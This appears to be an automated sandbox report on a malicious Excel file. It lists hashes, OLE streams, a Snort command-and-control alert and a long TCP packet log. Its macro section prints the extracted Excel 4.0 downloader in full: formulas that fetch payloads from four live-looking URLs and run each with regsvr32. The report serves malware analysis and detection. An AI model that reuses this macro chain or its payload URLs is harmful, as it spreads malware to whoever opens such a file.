                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..t7..t7..t7w.w6..t7w.q6!.t7w.p6..t7..q6..t7..p6..t7..w6..t7w.u6..t7..u7.t7e.q6..t7e.t6..t7e.7..t7...7..t7e.v6..t7Rich..t7................PE..d...)v.b.........." .........\......T,.......................................`............ .....................................................d....... ....0..8F...........P..........................................8...............8............................text............................... ..`.rdata...-..........................@..@.data...@'..........................@....pdata..8F...0...H..................@..@_RDATA...............>..............@..@.rsrc... ............@..............@..@.reloc.......P......................@..B........................................................................................................................................................................................

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: RGSGK, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Jul 13 08:31:28 2022, Security: 0
                                                                                                            Entropy (8bit):4.839190961545414
                                                                                                            TrID:
                                                                                                            • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                            File name:Bericht 6581.xls
                                                                                                            File size:98304
                                                                                                            MD5:349779ed9b68f3fc148e8d81a5fa1c2a
                                                                                                            SHA1:b940cabd8846120f3c383edac2ee817f280552c5
                                                                                                            SHA256:b8e39a80c58b7bfe21d4a9cc695128aa1b3066e3f85a2138fcacdc4fd96403a2
                                                                                                            SHA512:aaf8b276226f66a238f0da86c66be7137e1f6a72c0dbd90432c475b21fd8851afb672c5f5a0f871ad1eaf391f83ffb9f451d4b9b3dabeee9b432b454d0bd1793
                                                                                                            SSDEEP:1536:7kKpb8rGYrMPe3q7Q0XV5xtezEsi8/dg2HuS4hcTO97v7UYdEJmk:IKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgA
                                                                                                            TLSH:24A34A45BBA9DA1EF521873148EB47A67333FC204F6B47472264B3256FB99E04B0721B
                                                                                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                            File Icon

                                                                                                            Icon Hash:e4eea286a4b4bcb4

                                                                                                            Static OLE Info

                                                                                                            General

                                                                                                            Document Type:OLE
                                                                                                            Number of OLE Files:1

                                                                                                            OLE File "Bericht 6581.xls"

                                                                                                            Indicators
                                                                                                            Has Summary Info:
                                                                                                            Application Name:Microsoft Excel
                                                                                                            Encrypted Document:False
                                                                                                            Contains Word Document Stream:False
                                                                                                            Contains Workbook/Book Stream:True
                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                            Contains Visio Document Stream:False
                                                                                                            Contains ObjectPool Stream:False
                                                                                                            Flash Objects Count:0
                                                                                                            Contains VBA Macros:False
                                                                                                            Summary
                                                                                                            Code Page:1251
                                                                                                            Author:Dream
                                                                                                            Last Saved By:RGSGK
                                                                                                            Create Time:2015-06-05 18:19:34
                                                                                                            Last Saved Time:2022-07-13 07:31:28
                                                                                                            Creating Application:Microsoft Excel
                                                                                                            Security:0
                                                                                                            Document Summary
                                                                                                            Document Code Page:1251
                                                                                                            Thumbnail Scaling Desired:False
                                                                                                            Company:
                                                                                                            Contains Dirty Links:False
                                                                                                            Shared Document:False
                                                                                                            Changed Hyperlinks:False
                                                                                                            Application Version:1048576

                                                                                                            Streams

                                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                            General
                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                            File Type:data
                                                                                                            Stream Size:4096
                                                                                                            Entropy:0.3944713856337448
                                                                                                            Base64 Encoded:False
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . S h e e t 5 . . . . . S h e e t 6 . . . . . S h e e
                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 20 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 e0 00 00 00
                                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                            General
                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                            File Type:data
                                                                                                            Stream Size:4096
                                                                                                            Entropy:0.27687346627667914
                                                                                                            Base64 Encoded:False
                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D r e a m . . . . . . . . . . . R G S G K . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . @ . . . . j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 87782
                                                                                                            General
                                                                                                            Stream Path:Workbook
                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                            Stream Size:87782
                                                                                                            Entropy:5.201884271098224
                                                                                                            Base64 Encoded:True
                                                                                                            Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . R G S G K B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . V e 1 8 . . . . . . . X . @ . . .
                                                                                                            Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 52 47 53 47 4b 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                            Macro 4.0 Code

                                                                                                            Name:Sheet7
                                                                                                            Extraction:dynamic
                                                                                                            Type:4
                                                                                                            Final:False
                                                                                                            Visible:True
                                                                                                            Protected:False
                                                                                                            13,5,=ACOS(5365675754)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://atperson.com/campusvirtual/EOgFGo17w/","..\soci1.ocx",0,0)",F24)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\soci1.ocx")",F26)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://eliteturismo.com/phpmailer-old/dafdBxQONtk5Uf9dxll/","..\soci2.ocx",0,0)",F28)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\soci2.ocx")",F30)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://atici.net/c/JDFDBMIz/","..\soci3.ocx",0,0)",F32)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\soci3.ocx")",F34)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://domesticuif.co.za/libraries/nbnH9dpd/","..\soci4.ocx",0,0)",F36)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\soci4.ocx")",F38)=FORMULA("=RETURN()",F40)
                                                                                                            Name:Sheet7
                                                                                                            Extraction:dynamic
                                                                                                            Type:4
                                                                                                            Final:False
                                                                                                            Visible:True
                                                                                                            Protected:False
                                                                                                            13,5,=ACOS(5365675754)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://atperson.com/campusvirtual/EOgFGo17w/","..\soci1.ocx",0,0)",F24)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\soci1.ocx")",F26)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://eliteturismo.com/phpmailer-old/dafdBxQONtk5Uf9dxll/","..\soci2.ocx",0,0)",F28)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\soci2.ocx")",F30)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://atici.net/c/JDFDBMIz/","..\soci3.ocx",0,0)",F32)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\soci3.ocx")",F34)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://domesticuif.co.za/libraries/nbnH9dpd/","..\soci4.ocx",0,0)",F36)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\soci4.ocx")",F38)=FORMULA("=RETURN()",F40)
23,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://atperson.com/campusvirtual/EOgFGo17w/","..\soci1.ocx",0,0)
25,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\soci1.ocx")
27,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://eliteturismo.com/phpmailer-old/dafdBxQONtk5Uf9dxll/","..\soci2.ocx",0,0)
29,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\soci2.ocx")
31,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://atici.net/c/JDFDBMIz/","..\soci3.ocx",0,0)
33,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\soci3.ocx")
35,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://domesticuif.co.za/libraries/nbnH9dpd/","..\soci4.ocx",0,0)
37,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\soci4.ocx")
39,5,=RETURN()
                                                                                                            Name:Sheet7, Macrosheet
                                                                                                            Extraction:static
                                                                                                            Type:unknown
                                                                                                            Final:unknown
                                                                                                            Visible:True
                                                                                                            Protected:unknown
                                                                                                            SHEET: Sheet7, Macrosheet
CELL:F14, =((((((((ACOS(5365675754.0)=FORMULA((((((((((((('Sheet2'!L24&'Sheet2'!L26)&'Sheet2'!L27)&'Sheet2'!L28)&'Sheet2'!L28)&'Sheet3'!C8)&'Sheet3'!H15)&'Sheet2'!F10)&'Sheet3'!R4)&'Sheet6'!S18)&'Sheet3'!F20)&'Sheet4'!S10)&'Sheet6'!D8)&'Sheet4'!S17,F24))=FORMULA((((((((((((((((((('Sheet2'!L24&'Sheet2'!G8)&'Sheet2'!F4)&'Sheet2'!G8)&'Sheet2'!O3)&'Sheet2'!L30)&'Sheet2'!F24)&'Sheet2'!L26)&'Sheet4'!L13)&'Sheet4'!F7)&'Sheet2'!A4)&'Sheet4'!C15)&'Sheet2'!A4)&'Sheet4'!O33)&'Sheet2'!F10)&'Sheet4'!L23)&'Sheet4'!F20)&'Sheet6'!D8)&'Sheet2'!F24)&'Sheet2'!L31,F26))=FORMULA((((((((((((('Sheet2'!L24&'Sheet2'!L26)&'Sheet2'!L27)&'Sheet2'!L28)&'Sheet2'!L28)&'Sheet3'!C8)&'Sheet3'!H15)&'Sheet2'!F10)&'Sheet3'!R4)&'Sheet6'!S18)&'Sheet3'!G22)&'Sheet4'!S10)&'Sheet6'!F18)&'Sheet4'!S17,F28))=FORMULA((((((((((((((((((('Sheet2'!L24&'Sheet2'!G8)&'Sheet2'!F4)&'Sheet2'!G8)&'Sheet2'!O3)&'Sheet2'!L30)&'Sheet2'!F24)&'Sheet2'!L26)&'Sheet4'!L13)&'Sheet4'!F7)&'Sheet2'!A4)&'Sheet4'!C15)&'Sheet2'!A4)&'Sheet4'!O33)&'Sheet2'!F10)&'Sheet4'!L23)&'Sheet4'!F20)&'Sheet6'!F18)&'Sheet2'!F24)&'Sheet2'!L31,F30))=FORMULA((((((((((((('Sheet2'!L24&'Sheet2'!L26)&'Sheet2'!L27)&'Sheet2'!L28)&'Sheet2'!L28)&'Sheet3'!C8)&'Sheet3'!H15)&'Sheet2'!F10)&'Sheet3'!R4)&'Sheet6'!S18)&'Sheet3'!H20)&'Sheet4'!S10)&'Sheet6'!K3)&'Sheet4'!S17,F32))=FORMULA((((((((((((((((((('Sheet2'!L24&'Sheet2'!G8)&'Sheet2'!F4)&'Sheet2'!G8)&'Sheet2'!O3)&'Sheet2'!L30)&'Sheet2'!F24)&'Sheet2'!L26)&'Sheet4'!L13)&'Sheet4'!F7)&'Sheet2'!A4)&'Sheet4'!C15)&'Sheet2'!A4)&'Sheet4'!O33)&'Sheet2'!F10)&'Sheet4'!L23)&'Sheet4'!F20)&'Sheet6'!K3)&'Sheet2'!F24)&'Sheet2'!L31,F34))=FORMULA((((((((((((('Sheet2'!L24&'Sheet2'!L26)&'Sheet2'!L27)&'Sheet2'!L28)&'Sheet2'!L28)&'Sheet3'!C8)&'Sheet3'!H15)&'Sheet2'!F10)&'Sheet3'!R4)&'Sheet6'!S18)&'Sheet3'!I22)&'Sheet4'!S10)&'Sheet6'!Q12)&'Sheet4'!S17,F36))=FORMULA((((((((((((((((((('Sheet2'!L24&'Sheet2'!G8)&'Sheet2'!F4)&'Sheet2'!G8)&'Sheet2'!O3)&'Sheet2'!L30)&'Sheet2'!F24)&'Sheet2'!L26)&'Sheet4'!L13)&'Sheet4'!F7)&'Sheet2'!A4)&'Sheet4'!C15)&'Sheet2'!A4)&'Sheet4'!O33)&'Sheet2'!F10)&'Sheet4'!L23)&'Sheet4'!F20)&'Sheet6'!Q12)&'Sheet2'!F24)&'Sheet2'!L31,F38))=FORMULA((('Sheet2'!L24&'Sheet2'!G44)&'Sheet2'!H46)&'Sheet2'!J44,F40), 36

                                                                                                            Network Behavior

                                                                                                            Snort IDS Alerts

                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                            192.168.2.22174.138.33.494917770802404316 07/17/22-13:14:11.436544TCP2404316ET CNC Feodo Tracker Reported CnC Server TCP group 9491777080192.168.2.22174.138.33.49

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jul 17, 2022 13:09:09.529572010 CEST49171443192.168.2.2251.38.169.114
                                                                                                            Jul 17, 2022 13:09:09.529623985 CEST4434917151.38.169.114192.168.2.22
                                                                                                            Jul 17, 2022 13:09:09.529701948 CEST49171443192.168.2.2251.38.169.114
                                                                                                            Jul 17, 2022 13:09:09.556742907 CEST49171443192.168.2.2251.38.169.114
                                                                                                            Jul 17, 2022 13:09:09.556787014 CEST4434917151.38.169.114192.168.2.22
                                                                                                            Jul 17, 2022 13:09:09.639802933 CEST4434917151.38.169.114192.168.2.22
                                                                                                            Jul 17, 2022 13:09:09.639966011 CEST49171443192.168.2.2251.38.169.114
                                                                                                            Jul 17, 2022 13:09:09.650809050 CEST49171443192.168.2.2251.38.169.114
                                                                                                            Jul 17, 2022 13:09:09.650842905 CEST4434917151.38.169.114192.168.2.22
                                                                                                            Jul 17, 2022 13:09:09.651248932 CEST4434917151.38.169.114192.168.2.22
                                                                                                            Jul 17, 2022 13:09:09.652322054 CEST49171443192.168.2.2251.38.169.114
                                                                                                            Jul 17, 2022 13:09:09.927228928 CEST49171443192.168.2.2251.38.169.114
                                                                                                            Jul 17, 2022 13:09:09.968491077 CEST4434917151.38.169.114192.168.2.22
                                                                                                            Jul 17, 2022 13:09:10.154419899 CEST4434917151.38.169.114192.168.2.22
                                                                                                            Jul 17, 2022 13:09:10.154548883 CEST4434917151.38.169.114192.168.2.22
                                                                                                            Jul 17, 2022 13:09:10.154659033 CEST49171443192.168.2.2251.38.169.114
                                                                                                            Jul 17, 2022 13:09:10.154700041 CEST4434917151.38.169.114192.168.2.22
                                                                                                            Jul 17, 2022 13:09:10.154721975 CEST49171443192.168.2.2251.38.169.114
                                                                                                            Jul 17, 2022 13:09:10.155834913 CEST49171443192.168.2.2251.38.169.114
                                                                                                            Jul 17, 2022 13:09:10.155873060 CEST4434917151.38.169.114192.168.2.22
                                                                                                            Jul 17, 2022 13:09:10.155896902 CEST49171443192.168.2.2251.38.169.114
                                                                                                            Jul 17, 2022 13:09:10.155926943 CEST49171443192.168.2.2251.38.169.114
                                                                                                            Jul 17, 2022 13:09:10.156090975 CEST49171443192.168.2.2251.38.169.114
                                                                                                            Jul 17, 2022 13:09:10.599577904 CEST49172443192.168.2.2244.194.33.146
                                                                                                            Jul 17, 2022 13:09:10.599643946 CEST4434917244.194.33.146192.168.2.22
                                                                                                            Jul 17, 2022 13:09:10.599775076 CEST49172443192.168.2.2244.194.33.146
                                                                                                            Jul 17, 2022 13:09:10.600123882 CEST49172443192.168.2.2244.194.33.146
                                                                                                            Jul 17, 2022 13:09:10.600142002 CEST4434917244.194.33.146192.168.2.22
                                                                                                            Jul 17, 2022 13:11:20.648993969 CEST4434917244.194.33.146192.168.2.22
                                                                                                            Jul 17, 2022 13:11:20.652115107 CEST49173443192.168.2.2244.194.33.146
                                                                                                            Jul 17, 2022 13:11:20.652174950 CEST4434917344.194.33.146192.168.2.22
                                                                                                            Jul 17, 2022 13:11:20.652290106 CEST49173443192.168.2.2244.194.33.146
                                                                                                            Jul 17, 2022 13:11:20.652827978 CEST49173443192.168.2.2244.194.33.146
                                                                                                            Jul 17, 2022 13:11:20.652856112 CEST4434917344.194.33.146192.168.2.22
                                                                                                            Jul 17, 2022 13:13:31.720772982 CEST4434917344.194.33.146192.168.2.22
                                                                                                            Jul 17, 2022 13:13:31.723321915 CEST49174443192.168.2.2244.194.33.146
                                                                                                            Jul 17, 2022 13:13:31.723377943 CEST4434917444.194.33.146192.168.2.22
                                                                                                            Jul 17, 2022 13:13:31.723455906 CEST49174443192.168.2.2244.194.33.146
                                                                                                            Jul 17, 2022 13:13:31.723494053 CEST49174443192.168.2.2244.194.33.146
                                                                                                            Jul 17, 2022 13:13:31.723606110 CEST4434917444.194.33.146192.168.2.22
                                                                                                            Jul 17, 2022 13:13:31.723690987 CEST49174443192.168.2.2244.194.33.146
                                                                                                            Jul 17, 2022 13:13:32.266073942 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.336355925 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.336441994 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.336560965 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.406577110 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.416630983 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.416704893 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.416749954 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.416774988 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.416799068 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.416824102 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.416837931 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.416861057 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.416887045 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.416901112 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.416945934 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.416954041 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.416959047 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.416964054 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.417085886 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.417087078 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.417176008 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.440339088 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.486805916 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.486856937 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.486895084 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.486932993 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.486952066 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.486968994 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.486984015 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.486990929 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.487005949 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.487013102 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.487042904 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.487059116 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.487080097 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.487092018 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.487116098 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.487128973 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.487154007 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.487159967 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.487188101 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.487200022 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.487225056 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.487232924 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.487262011 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.487271070 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.487298012 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.487298965 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.487310886 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.487335920 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.487348080 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.487373114 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.487381935 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.487417936 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.487617970 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.511208057 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.511342049 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.556822062 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.556921005 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.556963921 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557003975 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557034016 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557043076 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557082891 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557121038 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557161093 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557161093 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557173967 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557197094 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557213068 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557251930 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557254076 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557265043 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557279110 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557291985 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557313919 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557334900 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557374001 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557414055 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557444096 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557455063 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557456970 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557465076 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557473898 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557493925 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557518005 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557533979 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557564020 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557574034 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557612896 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557646036 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557655096 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557657957 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557681084 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557693958 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557723045 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557737112 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557745934 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557776928 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557796001 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557816029 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557837009 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557856083 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557888985 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557894945 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557923079 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557934999 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557951927 CEST4917580192.168.2.22185.15.196.157
                                                                                                            Jul 17, 2022 13:13:32.557976007 CEST8049175185.15.196.157192.168.2.22
                                                                                                            Jul 17, 2022 13:13:32.557993889 CEST4917580192.168.2.22185.15.196.157
